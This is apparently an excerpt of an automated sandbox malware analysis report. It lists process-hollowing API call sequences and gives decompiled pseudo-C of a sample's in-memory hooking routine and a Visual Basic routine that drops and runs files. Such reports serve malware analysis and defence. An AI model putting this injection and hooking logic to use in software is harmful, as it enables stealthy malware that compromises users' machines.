CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 001F306A
NtReadVirtualMemory.NTDLL(?,?,?,000001D8,?), ref: 001F30AF
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 001F30D9
NtUnmapViewOfSection.NTDLL(?,?), ref: 001F30F4
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 001F310D
NtResumeThread.NTDLL(?,00000000), ref: 001F314B

Strings

e, xrefs: 001F2FD4
egas, xrefs: 001F2FC6
\Microsoft.NET\Framework\, xrefs: 001F2FDB
m.ex, xrefs: 001F2FCD
D, xrefs: 001F3045

Memory Dump Source

Source File: 00000005.00000002.978014703.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1f0000_vbc.jbxd

Similarity

API ID: Section$View$CreateMemoryVirtual$ProcessReadResumeThreadUnmapWrite
String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
API String ID: 615172284-1087957892
Opcode ID: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
Instruction ID: 3a176a938fbfb20614cc2365cc6846c5436013203db5e3f6f7f0d58249e80d91
Opcode Fuzzy Hash: bdfd8c2c08da80d8aef1ac999a3557cfaab083761e6134d184dbc6d082490619
Instruction Fuzzy Hash: E6E103B2D0465DAFDF21DFE5CC81AEEBBB8AF04304F14846AEA25A7241D7349A41CF54

Uniqueness

Uniqueness Score: -1.00%

Function 001F231B Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 356
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 001F2E92
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 001F2EBF

Strings

e, xrefs: 001F2FD4
egas, xrefs: 001F2FC6
\Microsoft.NET\Framework\, xrefs: 001F2FDB
m.ex, xrefs: 001F2FCD
D, xrefs: 001F3045

Memory Dump Source

Source File: 00000005.00000002.978014703.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1f0000_vbc.jbxd

Similarity

API ID: Section$CreateView
String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
API String ID: 1585966358-1087957892
Opcode ID: e5b3c6fdb99f7b6ee653007ef954c3259422cb049f75106ab78c0b26249ff7a6
Instruction ID: 26d0db4d24f7c1ff15440f5173c2aa40f3a79b669fec37f907bca7ba4b2d034b
Opcode Fuzzy Hash: e5b3c6fdb99f7b6ee653007ef954c3259422cb049f75106ab78c0b26249ff7a6
Instruction Fuzzy Hash: 5DD104B2D0465DAFDF219FE5CC81AFEBBB8BF08304F14806AE624A6241D7349A51DF54

Uniqueness

Uniqueness Score: -1.00%

Function 001F2CA3 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 354
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 001F2E92
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 001F2EBF

Strings

e, xrefs: 001F2FD4
egas, xrefs: 001F2FC6
\Microsoft.NET\Framework\, xrefs: 001F2FDB
m.ex, xrefs: 001F2FCD
D, xrefs: 001F3045

Memory Dump Source

Source File: 00000005.00000002.978014703.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1f0000_vbc.jbxd

Similarity

API ID: Section$CreateView
String ID: D$\Microsoft.NET\Framework\$e$egas$m.ex
API String ID: 1585966358-1087957892
Opcode ID: d869fe1dfd7ba8462786ba5dc0f5c93caae51ad8bd938814b7fffa88b8461c4a
Instruction ID: f61f5126dd2faf80fe7432721575ed32632f967d625126390949d6ccf7befa15
Opcode Fuzzy Hash: d869fe1dfd7ba8462786ba5dc0f5c93caae51ad8bd938814b7fffa88b8461c4a
Instruction Fuzzy Hash: 8AD104B2D0465DAFDF21DFE5CC81AFEBBB8AF08304F14806AE624A6241D7349A41DF54

Uniqueness

Uniqueness Score: -1.00%

Function 0FA328AB Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153
nativememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0FA328AB(void* __eflags) {
				long _v8;
				long _v12;
				void* _v16;
				long _v20;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				intOrPtr _v40;
				void* _t45;
				void* _t54;
				void* _t55;
				long _t57;
				long _t66;
				void* _t68;
				long _t81;
				void* _t82;
				int _t84;
				intOrPtr _t86;
				intOrPtr* _t95;
				void* _t98;
				void* _t102;
				void* _t104;
				void* _t105;

				_v20 = 0x100;
				_v12 = 5;
				E0FA32B9E(_t45, 0xfa3169a);
				_t103 = E0FA32E60("SysAllocStringByteLen");
				E0FA32BC0(_t102, 0xfa315f8);
				_v40 = E0FA32E01(_t47, "SysAllocStringByteLen");
				E0FA32BC0(_t50, 0xfa31629);
				_v32 = E0FA32E01(_t47, "SysAllocStringByteLen");
				E0FA32BC0(_t52, 0xfa3160f);
				_t54 = E0FA32E01(_t103, "SysAllocStringByteLen");
				_v36 = _t54;
				_v16 = _t54;
				if( *0xfa880b0 == 0) {
					_t81 = NtAllocateVirtualMemory(0xffffffff, 0xfa880b0, 0,  &_v20, 0x3000, 0x40);
					if(_t81 >= 0) {
						goto L3;
					} else {
						return _t81;
					}
				}
				L3:
				_t55 =  *0xfa880b0; // 0x1c0000
				_v28 = _t55 +  *0xfa880b4;
				_t57 = NtProtectVirtualMemory(0xffffffff,  &_v16,  &_v12, 0x40,  &_v8);
				if(_t57 < 0) {
					return _t57;
				}
				_t82 = 0;
				_t98 = _v28;
				_t104 = _v36;
				while(_t82 < 5) {
					_push( &_v24);
					_push(_t104);
					_t84 = E0FA314A6();
					_t68 = memcpy(_t98, _t104, _t84);
					_t105 = _t105 + 0xc;
					_t98 = _t104 + _t84 + _t84;
					_t82 = _t82 + _t68;
					_t95 = _v24;
					_t86 =  *_t95;
					if(_t86 == 0xe9 || _t86 == 0xe8) {
						 *((intOrPtr*)(_t98 - 4)) =  *((intOrPtr*)(_t95 + 1)) + _t104 - _t98;
					} else {
						if(_t86 != 0xeb) {
							if(_t86 < 0x70 || _t86 > 0x7f) {
								if(_t86 == 0xf && _t86 >= 0x80 && _t86 <= 0x8f) {
									 *((intOrPtr*)(_t98 - 4)) =  *((intOrPtr*)(_t95 + 2)) + _t104 - _t98;
								}
							} else {
								 *((char*)(_t98 - 2)) = 0xf;
								 *((char*)(_t98 - 1)) = _t86 + 0x10;
								asm("stosd");
							}
						} else {
							 *((char*)(_t98 - 2)) = 0xe9;
							 *((intOrPtr*)(_t98 - 1)) =  *((char*)(_t95 + 1)) + _t104 - 3 - _t98;
							_t98 = _t98 + 3;
						}
					}
				}
				 *0xfa880b4 =  *0xfa880b4 + _t82 + 5;
				asm("stosb");
				asm("stosd");
				 *0xfa880a4 = _v36;
				asm("stosb");
				 *0xfa880a8 = E0FA32A78;
				asm("stosd");
				 *0xfa880ac = _v28;
				_v12 = 5;
				_t66 = NtProtectVirtualMemory(0xffffffff,  &_v36,  &_v12, _v8,  &_v8);
				 *0xfa880b8 =  *0xfa880b8 + 1;
				return _t66;
			}

0x0fa328b5
0x0fa328bc
0x0fa328c8
0x0fa328d7
0x0fa328dd
0x0fa328ed
0x0fa328f5
0x0fa32905
0x0fa3290d
0x0fa32918
0x0fa3291d
0x0fa32920
0x0fa3292a
0x0fa32942
0x0fa32948
0x00000000
0x00000000
0x00000000
0x00000000
0x0fa32948
0x0fa3294f
0x0fa3294f
0x0fa3295a
0x0fa3296d
0x0fa32973
0x00000000
0x00000000
0x0fa3297a
0x0fa3297c
0x0fa3297f
0x0fa32982
0x0fa3298e
0x0fa3298f
0x0fa32995
0x0fa32997
0x0fa32997
0x0fa32997
0x0fa32999
0x0fa3299b
0x0fa3299e
0x0fa329a4
0x0fa329b3
0x0fa329b8
0x0fa329bb
0x0fa329d6
0x0fa329f7
0x0fa32a0b
0x0fa32a0b
0x0fa329dd
0x0fa329e7
0x0fa329ee
0x0fa329f1
0x0fa329f1
0x0fa329bd
0x0fa329c7
0x0fa329cb
0x0fa329ce
0x0fa329ce
0x0fa329bb
0x0fa32a0e
0x0fa32a16
0x0fa32a1e
0x0fa32a26
0x0fa32a2a
0x0fa32a32
0x0fa32a36
0x0fa32a47
0x0fa32a4b
0x0fa32a51
0x0fa32a69
0x0fa32a6c
0x00000000

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,00000100,00000000,00000100,00003000,00000040,?,SysAllocStringByteLen,0FA3160F,?,SysAllocStringByteLen,0FA31629,?,SysAllocStringByteLen,0FA315F8,SysAllocStringByteLen), ref: 0FA32942
NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,00000040,?,?,SysAllocStringByteLen,0FA3160F,?,SysAllocStringByteLen,0FA31629,?,SysAllocStringByteLen,0FA315F8,SysAllocStringByteLen,0FA3169A), ref: 0FA3296D
NtProtectVirtualMemory.NTDLL(000000FF,?,00000005,?,?,?,SysAllocStringByteLen,0FA3160F,?,SysAllocStringByteLen,0FA31629,?,SysAllocStringByteLen,0FA315F8,SysAllocStringByteLen,0FA3169A), ref: 0FA32A69

Strings

SysAllocStringByteLen, xrefs: 0FA328CD, 0FA328E2, 0FA328FA, 0FA32912

Memory Dump Source

Source File: 00000005.00000002.978411638.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000005.00000002.978404014.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978611441.000000000FA88000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.978618338.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fa30000_vbc.jbxd

Similarity

API ID: MemoryVirtual$Protect$Allocate
String ID: SysAllocStringByteLen
API String ID: 955180148-3231582829
Opcode ID: d88a14af00e3bab896dd753b0e892d9fab5a7abdc8cfb62c900ada49e05d1b5d
Instruction ID: 5cb74d0948e2d3b12df0698b0037cd14d92d0fba7cd77b2ae8e78e8f385f0f15
Opcode Fuzzy Hash: d88a14af00e3bab896dd753b0e892d9fab5a7abdc8cfb62c900ada49e05d1b5d
Instruction Fuzzy Hash: 9D51C575D0020AAFDB10DFA8C941BEEFBF5FB84720F944306F11166196D7BCA5418BA2

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4AA50 Relevance: 170.8, APIs: 90, Strings: 7, Instructions: 1062
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E0FA4AA50(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v76;
				signed int _v84;
				signed int _v88;
				char _v120;
				char _v136;
				intOrPtr _v148;
				void _v184;
				char _v188;
				char _v192;
				char _v196;
				intOrPtr _v204;
				char _v212;
				char _v228;
				char _v244;
				char _v260;
				char _v276;
				char _v280;
				intOrPtr _v284;
				char* _v288;
				intOrPtr _v292;
				char _v296;
				char* _v304;
				char _v312;
				intOrPtr _v320;
				char _v328;
				intOrPtr _v336;
				char _v344;
				intOrPtr _v352;
				intOrPtr _v360;
				intOrPtr _v368;
				intOrPtr _v376;
				intOrPtr _v384;
				intOrPtr _v392;
				intOrPtr _v400;
				intOrPtr _v408;
				char* _v416;
				intOrPtr _v424;
				char _v432;
				intOrPtr _v440;
				signed int _v444;
				char _v448;
				intOrPtr _v452;
				signed int _v460;
				char _v464;
				intOrPtr _v492;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				void* _t489;
				void* _t494;
				intOrPtr _t506;
				signed int _t514;
				signed short _t516;
				signed int _t518;
				signed int _t522;
				intOrPtr _t535;
				signed int _t540;
				char* _t550;
				intOrPtr _t576;
				char* _t581;
				intOrPtr _t599;
				char* _t606;
				char* _t607;
				intOrPtr _t620;
				intOrPtr _t631;
				intOrPtr _t642;
				intOrPtr _t652;
				intOrPtr _t663;
				intOrPtr _t675;
				intOrPtr _t687;
				intOrPtr _t697;
				intOrPtr* _t704;
				intOrPtr* _t705;
				signed int _t741;
				intOrPtr* _t911;
				intOrPtr* _t928;
				intOrPtr* _t994;
				intOrPtr* _t997;
				intOrPtr* _t1004;
				intOrPtr _t1005;
				intOrPtr* _t1007;
				intOrPtr* _t1010;
				intOrPtr* _t1014;
				intOrPtr* _t1016;
				void* _t1017;
				intOrPtr* _t1018;
				intOrPtr* _t1019;
				void* _t1020;
				void* _t1021;
				void* _t1022;
				intOrPtr _t1023;
				intOrPtr _t1024;
				void* _t1025;
				void* _t1026;
				intOrPtr* _t1028;
				void* _t1029;
				intOrPtr* _t1032;

				_t1021 = _t1022;
				_t1023 = _t1022 - 8;
				 *[fs:0x0] = _t1023;
				_t1024 = _t1023 - 0x200;
				_v12 = _t1024;
				_v8 = 0xfa31200;
				memset( &_v184, 0, 0x1b << 2);
				_t1025 = _t1024 + 0xc;
				_v24 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v52 = 0;
				_v60 = 0;
				_v76 = 0;
				_v188 = 0;
				_v192 = 0;
				_v196 = 0;
				_v212 = 0;
				_v228 = 0;
				_v244 = 0;
				_v260 = 0;
				_v276 = 0;
				_v280 = 0;
				_v296 = 0;
				_v312 = 0;
				_v328 = 0;
				_v344 = 0;
				_v360 = 0;
				_v376 = 0;
				_v392 = 0;
				_v408 = 0;
				_v424 = 0;
				_v440 = 0;
				_v448 = 0;
				_v464 = 0;
				E0FA3192D(__edi);
				E0FA3192D(__esi);
				E0FA3192D(__ebx);
				E0FA3192D( *[fs:0x0]);
				E0FA3192D(0xfa32ff6);
				E0FA3192D(_t1020);
				E0FA3192D();
				E0FA3192D();
				E0FA3192D();
				E0FA3192D();
				E0FA3192D();
				_v44 = 1;
				E0FA3192D();
				E0FA4BD90(__ebx,  &_v184 + 0x1b, 0); // executed
				__imp____vbaFreeVar( &_v212);
				_t489 = E0FA32BDC( &_v212, 0xfa881f8); // executed
				_t1035 = _t489;
				if(_t489 == 0) {
					L49:
					_push(0xfa4badb);
					L50:
					__imp____vbaAryUnlock( &_v464);
					_t1014 = __imp____vbaAryDestruct;
					 *_t1014(0,  &_v24);
					_t994 = __imp____vbaFreeVar;
					 *_t994();
					__imp____vbaFreeObj();
					 *_t1014(0xfa35a80,  &_v60);
					_t494 =  *_t994();
					__imp____vbaRecDestruct(L" l",  &_v184);
					return _t494;
				}
				_t704 = __imp____vbaRedim;
				 *_t704(0x880, 0x10,  &_v280, 0, 1, 3, 0);
				_v288 = 0xffffffff;
				_v296 = 3;
				_t1026 = _t1025 + 0x1c;
				_t1016 = __imp____vbaVarMove;
				 *_t1016();
				_v304 = 0x22;
				_v312 = 3;
				_v500 =  *(_v280 + 0x14) << 4;
				 *_t1016();
				_v320 = E0FA4AA30();
				_v328 = 3;
				 *_t1016();
				_v336 = 4;
				_v344 = 3;
				 *_t1016();
				_t506 =  *0xfa881f8; // 0x0
				L0FA32CA7( *((intOrPtr*)( *((intOrPtr*)(_t506 + 0xc)) + (3 -  *((intOrPtr*)(_t506 + 0x14))) * 4)),  *((intOrPtr*)( *((intOrPtr*)(_t506 + 0xc)) + (3 -  *((intOrPtr*)(_t506 + 0x14))) * 4)),  &_v280); // executed
				__imp____vbaErase(0,  &_v280);
				_t997 = __imp__#644;
				_v452 =  *_t997( &_v52);
				_v448 = E0FA85D80(_t704, _t997, _t1021, _t1035);
				E0FA32F7A(_v452,  *_t997( &_v448), 4);
				_t514 =  &_v196;
				__imp____vbaObjSetAddref(_t514, _v52);
				__imp__#644(_t514);
				asm("sbb edi, edi");
				_t1001 =  ~( ~_t514 + 1);
				__imp____vbaFreeObj();
				if( ~( ~_t514 + 1) != 0) {
					goto L49;
				}
				__imp____vbaObjSetAddref( &_v184,  &_v60);
				_t516 = E0FA85DF0(_t704, _t1001, _t1016, _v52,  &_v196, _v52); // executed
				_t1003 =  !_t516;
				__imp____vbaFreeObj();
				if( !_t516 == 0) {
					_t741 = _v88;
					_t518 = _t741 & 0x0000000c;
					if(_t518 == 4) {
						_v48 = 0x40;
					} else {
						if(_t518 == 8) {
							_v48 = 0x30;
						} else {
							if(_t518 == 0xc) {
								_v48 = 0x10;
							}
						}
					}
					if( ~(_t741 & 0x00000001) == 0xffff) {
						E0FA4BE20(_t704, _t1003, _t1016,  &_v136,  &_v48,  &_v120);
					}
					if((_v84 & 0x00000020) == 0 || E0FA4BED0(0, 0, 0, 0xffffffff) == 0) {
						_t1004 = __imp____vbaErase;
					} else {
						E0FA4BE20(_t704, _t1003, _t1016,  &_v136,  &_v48,  &_v120);
						 *_t704(0x880, 0x10,  &_v280, 0, 1, 0, 0);
						_v288 = 0;
						_v296 = 3;
						_t1026 = _t1026 + 0x1c;
						 *_t1016();
						_t697 =  *0xfa881f8; // 0x0
						L0FA32CA7( *((intOrPtr*)( *((intOrPtr*)(_t697 + 0xc)) + (6 -  *((intOrPtr*)(_t697 + 0x14))) * 4)),  *((intOrPtr*)( *((intOrPtr*)(_t697 + 0xc)) + (6 -  *((intOrPtr*)(_t697 + 0x14))) * 4)),  &_v280);
						_t1004 = __imp____vbaErase;
						 *_t1004(0,  &_v280);
					}
					if((_v84 & 0x00000010) != 0 && E0FA4BAF0(_t704, _t1004, _t1016) != 0) {
						E0FA4BE20(_t704, _t1004, _t1016,  &_v136,  &_v48,  &_v120);
						 *_t704(0x880, 0x10,  &_v280, 0, 1, 0, 0);
						_v288 = 0;
						_v296 = 3;
						_t1026 = _t1026 + 0x1c;
						_v504 =  *(_v280 + 0x14) << 4;
						 *_t1016();
						_t687 =  *0xfa881f8; // 0x0
						L0FA32CA7( *((intOrPtr*)(_t687 + 0xc)),  *((intOrPtr*)( *((intOrPtr*)(_t687 + 0xc)) + (6 -  *((intOrPtr*)(_t687 + 0x14))) * 4)),  &_v280);
						 *_t1004(0,  &_v280);
					}
					if((_v84 & 0x00000008) != 0) {
						E0FA86A30(_t704, _t1004, _t1016);
					}
					if((_v84 & 0x00000040) != 0 && E0FA4BF50() != 0) {
						E0FA4BE20(_t704, _t1004, _t1016,  &_v136,  &_v48,  &_v120);
						 *_t704(0x880, 0x10,  &_v280, 0, 1, 0, 0);
						_v288 = 0;
						_v296 = 3;
						_t1026 = _t1026 + 0x1c;
						_v508 =  *(_v280 + 0x14) << 4;
						 *_t1016();
						_t675 =  *0xfa881f8; // 0x0
						L0FA32CA7( *((intOrPtr*)(_t675 + 0xc)),  *((intOrPtr*)( *((intOrPtr*)(_t675 + 0xc)) + (6 -  *((intOrPtr*)(_t675 + 0x14))) * 4)),  &_v280);
						 *_t1004(0,  &_v280);
					}
					if((_v84 & 0x00000007) == 1 && E0FA4BED0(0xffffffff, 0, 0, 0) != 0) {
						E0FA4BE20(_t704, _t1004, _t1016,  &_v136,  &_v48,  &_v120);
						 *_t704(0x880, 0x10,  &_v280, 0, 1, 0, 0);
						_v288 = 0;
						_v296 = 3;
						_t1026 = _t1026 + 0x1c;
						_v512 =  *(_v280 + 0x14) << 4;
						 *_t1016();
						_t663 =  *0xfa881f8; // 0x0
						L0FA32CA7( *((intOrPtr*)(_t663 + 0xc)),  *((intOrPtr*)( *((intOrPtr*)(_t663 + 0xc)) + (6 -  *((intOrPtr*)(_t663 + 0x14))) * 4)),  &_v280);
						 *_t1004(0,  &_v280);
					}
					_t522 = _v84 & 0x00000007;
					if(_t522 == 2) {
						E0FA35BC0();
						_v444 = _t522;
						__imp____vbaSetSystemError();
						if(_v444 != 0) {
							E0FA4BE20(_t704, _t1004, _t1016,  &_v136,  &_v48,  &_v120);
							 *_t704(0x880, 0x10,  &_v280, 0, 1, 0, 0);
							_v288 = 0;
							_v296 = 3;
							_t1026 = _t1026 + 0x1c;
							_v516 =  *(_v280 + 0x14) << 4;
							 *_t1016();
							_t652 =  *0xfa881f8; // 0x0
							L0FA32CA7( *((intOrPtr*)(_t652 + 0xc)),  *((intOrPtr*)( *((intOrPtr*)(_t652 + 0xc)) + (6 -  *((intOrPtr*)(_t652 + 0x14))) * 4)),  &_v280);
							 *_t1004(0,  &_v280);
						}
					}
					if((_v84 & 0x00000007) == 3 && E0FA4BED0(0, 0, 0xffffffff, 0) != 0) {
						E0FA4BE20(_t704, _t1004, _t1016,  &_v136,  &_v48,  &_v120);
						 *_t704(0x880, 0x10,  &_v280, 0, 1, 0, 0);
						_v288 = 0;
						_v296 = 3;
						_t1026 = _t1026 + 0x1c;
						_v520 =  *(_v280 + 0x14) << 4;
						 *_t1016();
						_t642 =  *0xfa881f8; // 0x0
						L0FA32CA7( *((intOrPtr*)(_t642 + 0xc)),  *((intOrPtr*)( *((intOrPtr*)(_t642 + 0xc)) + (6 -  *((intOrPtr*)(_t642 + 0x14))) * 4)),  &_v280);
						 *_t1004(0,  &_v280);
					}
					if((_v84 & 0x00000007) == 4 && E0FA49BC0(_t704, _t1004, _t1016) != 0) {
						E0FA4BE20(_t704, _t1004, _t1016,  &_v136,  &_v48,  &_v120);
						 *_t704(0x880, 0x10,  &_v280, 0, 1, 0, 0);
						_v288 = 0;
						_v296 = 3;
						_t1026 = _t1026 + 0x1c;
						_v524 =  *(_v280 + 0x14) << 4;
						 *_t1016();
						_t631 =  *0xfa881f8; // 0x0
						L0FA32CA7( *((intOrPtr*)(_t631 + 0xc)),  *((intOrPtr*)( *((intOrPtr*)(_t631 + 0xc)) + (6 -  *((intOrPtr*)(_t631 + 0x14))) * 4)),  &_v280);
						 *_t1004(0,  &_v280);
					}
					if((_v84 & 0x00000007) == 5 && E0FA86830(_t704, _t1004, _t1016) != 0) {
						E0FA4BE20(_t704, _t1004, _t1016,  &_v136,  &_v48,  &_v120);
						 *_t704(0x880, 0x10,  &_v280, 0, 1, 0, 0);
						_v288 = 0;
						_v296 = 3;
						_t1026 = _t1026 + 0x1c;
						 *_t1016();
						_t620 =  *0xfa881f8; // 0x0
						L0FA32CA7( *((intOrPtr*)( *((intOrPtr*)(_t620 + 0xc)) + (6 -  *((intOrPtr*)(_t620 + 0x14))) * 4)),  *((intOrPtr*)( *((intOrPtr*)(_t620 + 0xc)) + (6 -  *((intOrPtr*)(_t620 + 0x14))) * 4)),  &_v280);
						 *_t1004(0,  &_v280);
					}
					_t705 = __imp____vbaVarCat;
					_t1005 = 0;
					_v492 = _v148 - 1;
					_v56 = 0;
					while(_t1005 <= _v492) {
						if(_t1005 ==  *((intOrPtr*)( &_v184 + 0x28))) {
							L44:
							_t1005 = _t1005 + 1;
							_v56 = _t1005;
							continue;
						}
						__imp____vbaAryLock(_v60);
						_v288 = 0xfa35db8;
						_t1007 =  *((intOrPtr*)(_v464 + 0xc)) + (_t1005 -  *((intOrPtr*)(_v464 + 0x14)) + (_t1005 -  *((intOrPtr*)(_v464 + 0x14))) * 4) * 4;
						_v296 = 8;
						__imp____vbaVarCopy();
						_t550 =  *((intOrPtr*)(_t1007 + 4));
						_t1028 = _t1026 - 0x10;
						_t911 = _t1028;
						_v296 = 8;
						_v288 = _t550;
						 *_t911 = 8;
						 *((intOrPtr*)(_t911 + 4)) = _v292;
						 *((intOrPtr*)(_t911 + 8)) = _t550;
						 *((intOrPtr*)(_t911 + 0xc)) = _v284;
						E0FA4C960(_t705, _t1007, _t1016,  &_v212,  &_v464);
						__imp____vbaAryLock( &_v188, _v60);
						_v304 =  *_t1007;
						_v312 = 8;
						_v328 = 8;
						_v320 =  *((intOrPtr*)(_t1007 + 8));
						__imp____vbaStrVarMove( *_t705( &_v260,  &_v328,  *_t705( &_v244,  &_v312,  *_t705( &_v228,  &_v40,  &_v212))));
						__imp____vbaStrMove();
						_t298 = (_v56 -  *((intOrPtr*)(_v188 + 0x14)) + (_v56 -  *((intOrPtr*)(_v188 + 0x14))) * 4) * 4; // 0xfa33006
						_v444 = E0FA4A060(_t705, _t1007, _t1016,  &_v192,  *((intOrPtr*)(_v188 + 0xc)) + _t298 + 0x10);
						__imp____vbaAryUnlock( &_v188);
						_v460 =  !_v444;
						__imp____vbaFreeStr();
						__imp____vbaFreeVarList(4,  &_v212,  &_v228,  &_v244,  &_v260);
						_t1029 = _t1028 + 0x14;
						if(_v460 != 0) {
							_t1018 = __imp____vbaVarDup;
							_v304 = L"Error";
							_v312 = 8;
							 *_t1018();
							_v448 = 0x10;
							_v288 = L"Can\'t save data to file!";
							_v296 = 8;
							 *_t1018();
							E0FA4BE20(_t705, 8, _t1018,  &_v212,  &_v448,  &_v228);
							__imp____vbaFreeVarList(2,  &_v212,  &_v228);
							_push(0xfa4badb);
							goto L50;
						}
						__imp____vbaRedim(0x880, 0x10,  &_v280, 0, 1, 5, 0);
						_v336 = 0;
						_v344 = 2;
						_v528 =  *(_v280 + 0x14) << 4;
						_t576 =  *_t1016();
						__imp____vbaStrCat(0xfa35fa0, 0xfa35f18);
						__imp____vbaStrMove();
						__imp____vbaStrCat(_t576);
						_v204 = _t576;
						_v212 = 8;
						_v352 = E0FA4BF90(_t705, _t1007, _t1016,  &_v212);
						_v360 = 3;
						_v532 =  *(_v280 + 0x14) << 4;
						 *_t1016();
						_t581 =  *((intOrPtr*)(_t1007 + 4));
						_t1032 = _t1029 + 0x1c - 0x10;
						_t928 = _t1032;
						_v296 = 8;
						_v288 = _t581;
						 *_t928 = 8;
						 *((intOrPtr*)(_t928 + 4)) = _v292;
						 *((intOrPtr*)(_t928 + 8)) = _t581;
						 *((intOrPtr*)(_t928 + 0xc)) = _v284;
						E0FA4C960(_t705, _t1007, _t1016,  &_v228, 0xfa35fa8);
						_v304 =  *_t1007;
						_v312 = 8;
						_v328 = 8;
						_v320 =  *((intOrPtr*)(_t1007 + 8));
						_v368 = E0FA4BF90(_t705, _t1007, _t1016,  *_t705( &_v276,  &_v328,  *_t705( &_v260,  &_v312,  *_t705( &_v244,  &_v40,  &_v228))));
						_v376 = 3;
						 *_t1016();
						_v384 = 0;
						_v392 = 3;
						 *_t1016();
						_v400 = 0;
						_v408 = 3;
						 *_t1016();
						_v416 =  &_v44;
						_v424 = 0x4003;
						__imp____vbaVarZero();
						_t599 =  *0xfa881f8; // 0x0
						_v448 = L0FA32CA7( *((intOrPtr*)(_t599 + 0xc)),  *((intOrPtr*)( *((intOrPtr*)(_t599 + 0xc)) + (0x1e -  *((intOrPtr*)(_t599 + 0x14))) * 4)),  &_v280);
						__imp____vbaErase(0,  &_v280);
						_v432 = _v448;
						_v440 = 3;
						 *_t1016();
						__imp____vbaFreeStr();
						_t1010 = __imp____vbaFreeVarList;
						 *_t1010(5,  &_v212,  &_v228,  &_v244,  &_v260,  &_v276);
						_t1026 = _t1032 + 0x18;
						_t606 =  &_v76;
						_v288 = 0x20;
						_v296 = 0x8002;
						__imp____vbaVarCmpGt( &_v212,  &_v296, _t606);
						_t607 =  &_v228;
						__imp____vbaVarNot(_t607, _t606);
						__imp____vbaBoolVarNull(_t607);
						if(_t607 != 0) {
							_t1019 = __imp____vbaVarDup;
							_v304 = L"Error";
							_v312 = 8;
							 *_t1019();
							_v448 = 0x10;
							_v288 = L"Can\'t run file!";
							_v296 = 8;
							 *_t1019();
							E0FA4BE20(8, _t1010, _t1019,  &_v212,  &_v448,  &_v228);
							 *_t1010(2,  &_v212,  &_v228);
							_push(0xfa4badb);
							goto L50;
						}
						__imp____vbaAryUnlock( &_v464);
						_t1005 = _v56;
						goto L44;
					}
					_t1017 =  &_v184;
					__eflags =  *(_t1017 + 0x28);
					if( *(_t1017 + 0x28) >= 0) {
						__eflags =  ~( *(_t1017 + 0x68) >> 0x00000004 & 0x00000001) - 0xffff;
						__imp____vbaRedim(0x880, 0x10,  &_v280, 0, 1, 0, 0);
						_v288 = _t1017 + 0x2c;
						_v296 = 0x4003;
						__imp____vbaVarZero();
						_t535 =  *0xfa881f8; // 0x0
						L0FA32CA7( *((intOrPtr*)( *((intOrPtr*)(_t535 + 0xc)) + (9 -  *((intOrPtr*)(_t535 + 0x14))) * 4)),  *((intOrPtr*)( *((intOrPtr*)(_t535 + 0xc)) + (9 -  *((intOrPtr*)(_t535 + 0x14))) * 4)),  &_v280); // executed
						__imp____vbaErase(0,  &_v280);
						__imp____vbaAryLock( &_v188, _v60);
						_t540 =  *(_t1017 + 0x28) -  *((intOrPtr*)(_v188 + 0x14));
						__eflags = _t540;
						_t460 = (_t540 + _t540 * 4) * 4; // 0xfa33006
						E0FA4A1C0(_t705,  *(_v280 + 0x14) << 4, _t1017,  &_v212,  *((intOrPtr*)(_v188 + 0xc)) + _t460 + 0x10, _t1017 + 0x50); // executed
